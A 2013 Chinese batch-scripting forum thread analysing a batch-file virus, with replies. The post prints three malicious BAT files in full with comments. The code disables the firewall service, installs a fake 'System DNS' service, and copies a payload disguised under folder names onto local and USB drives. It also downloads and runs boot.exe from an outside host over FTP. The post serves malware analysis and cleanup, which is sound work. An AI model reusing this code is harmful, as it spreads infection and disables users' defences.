[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖
所需阅读权限 1

[原创] 一个批处理病毒解读:systen.exe

本帖最后由 cjiabing 于 2013-2-16 18:38 编辑

最近在办公室电脑发现一个病毒,其中有三个BAT文件,现在拿出来解读下,方便大家杀毒!~
专杀推荐使用:批处理杀毒模板VirusCleaner V1.0.bat


dd.bat病毒文件注释

del C:\WINDOWS\system32\a.txt,C:\WINDOWS\system32\b.txt,C:\WINDOWS\system32\c.txt,C:\WINDOWS\system32\d.txt
::删除a、b、c、d四个文档,应该是临时文件,没见到内容。
ATTRIB C:\WINDOWS\system32\mail3.vbe +s +h & ATTRIB C:\WINDOWS\system32\Attusb.dll +s +h & ATTRIB C:\WINDOWS\system32\autousb.bat +s +h & ATTRIB C:\WINDOWS\system32\WIN.bat +s +h
::给几个病毒文件添加隐藏和系统属性:mail3.vbe、Attusb.dll、autousb.bat、WIN.bat
::看英文名称大概懂得它们的作用。
dir d:\ /a:d-s /b > %SystemRoot%\system32\ok.txt
::多余的一个步骤:获得D盘的文件夹
for /f "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB  "d:\%%q" +s +h & copy %SystemRoot%\system32\down.exe "d:\%%q.exe"
)
)
del %0
::隐藏D盘文件夹,并拷贝病毒文件down.exe进去,伪装成原来的文件夹。
::最后删掉本程序。不懂怎么多了一个括号,看来这家伙学艺不精。
WIN.bat 病毒文件注释




start "C:\Program Files\Internet Explorer\IEXPLORE.EXE"  http : // www .kkk8. org
::后台打开某个网页,估计是病毒网站,不要随便打开!
@ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
::搜索SuCH0ST.exe?搞不懂,没必要这样麻烦吧?SuCH0ST.exe有点模仿系统进程的意味!~
@ if %ERRORLEVEL%==0 goto ok
@ if %ERRORLEVEL%==1 goto end
::不喜欢用返回码,用&&和||更好。
::不喜欢一堆@头……,一个@echo off的事……
k
::我总觉得这样的临时文件和标签很有我早期写BAT的风格,难道是我的粉……?!
@ net stop sharedaccess
sc stop sharedaccess
::停用系统防火墙服务:sharedaccess
^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
::这种用法没接触过,有点那个……
@ cmd /c sc create DNSSystem  binpath= "%systemroot%\system32\SVCH0S                                                                               /c  start SuCH0ST.exe " start= auto
@ cmd /c sc config DNSSystem displayname= "System DNS"
@ cmd /c sc config DNSSystem type= interact type= own
@ cmd /c sc description DNSSystem "(C) Microsoft Corporation 公司提供的(DNS)域名解析程序,如果该服务被停用,任何依赖它的服务将无法启动。"
@ sc start DNSSystem
::无非是山寨服务项:DNSSystem
%SystemRoot%\system32\SuCH0ST.exe
@ exit
::运行SuCH0ST.exe并退出此程序。
:end
@ net stop sharedaccess
sc stop sharedaccess
del boot.exe /q
::这个boot.exe是干嘛用的?
echo o kkksunhopp.3322.org  > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo del down.exe >> 1.RMVB&echo bye >> 1.RMVB
::写了几条信息到文件 1.RMVB 中,搞嘛?
ftp -s:1.RMVB
del 1.RMVB
::ftp并删除
ping 127.0.0.1 -n 3
cmd /c boot.exe
ping 127.0.0.1 -n 10
del %SystemRoot%\system32\boot.exe /q
exit
::间隔运行boot.exe,这个就是隐藏后台运行的家伙。

autousb.bat 病毒文件注释



setlocal EnableDelayedExpansion
:1
fsutil fsinfo drives >%SystemRoot%\system32\output.txt
find ":\" < %SystemRoot%\system32\output.txt >%SystemRoot%\system32\out.txt
del %SystemRoot%\system32\output.txt /q
for /f %%i in (%SystemRoot%\system32\out.txt) do (
fsutil fsinfo drivetype %%i|find "可移动驱动器" &&echo %%i>>%SystemRoot%\system32\output.txt
)
::无非是获得可移动驱动器——U盘。

if not exist %SystemRoot%\system32\output.txt goto 3
for /f %%r in (%SystemRoot%\system32\output.txt) do (
set var=%%r
cd /d !var!
dir /a:d-s /b > %SystemRoot%\system32\ok.txt
for /f  "delims=" %%q in (%SystemRoot%\system32\ok.txt) do (
ATTRIB  "%%q" +s +h & copy %SystemRoot%\system32\down.exe "!var!%%q.exe"
)
)
::同上,将病毒伪装成U盘文件夹。
:3
EXPL0RER /n 10 127.0.1 &goto 1
::定位?估计又被山寨了,这个EXPL0RER中间是数字0,而非字母O!!不懂干嘛用的。
寂寞是黑白的,但黑白不是寂寞,是永恒。BAT 需要的不是可能,而是智慧。

看不懂  深奥啊

TOP

觉得很粗糙,之前也抓过,但不懂怎么破,不同的是我抓的是exe的,没有批处理辅助。

TOP

看到这个病毒脚本,我笑了。。。07年我写的就比这些好了,曾经写过病毒生成机,可自动生成病毒脚本。突然怀念过去的脚本了。。。过来顶一下,我是反病毒的逍遥@浪子@
逍遥@浪子@反病毒
http://hi.baidu.com/luckboy039

TOP

看不懂  深奥啊
狱渊 发表于 2013-4-30 10:21



    病毒特征与原理:第一,隐藏第二传播,第三复制演变。。。。。。

TOP

看了,有很多不懂,求解惑:
1.ATTRIB  "d:\%%q" +s +h & copy %SystemRoot%\system32\down.exe "d:\%%q.exe
        这句生成带exe后缀的“文件名”,应该是没有用户看了会按的吧,中毒现象太明显了
        如果直接copy成 无后缀的文件,好像是生成不出来的
2.DNSSystem有什么作用,百度不出来
3.cmd命令 为什么要使用这个命令 直接运行也是可以的吧

TOP

返回列表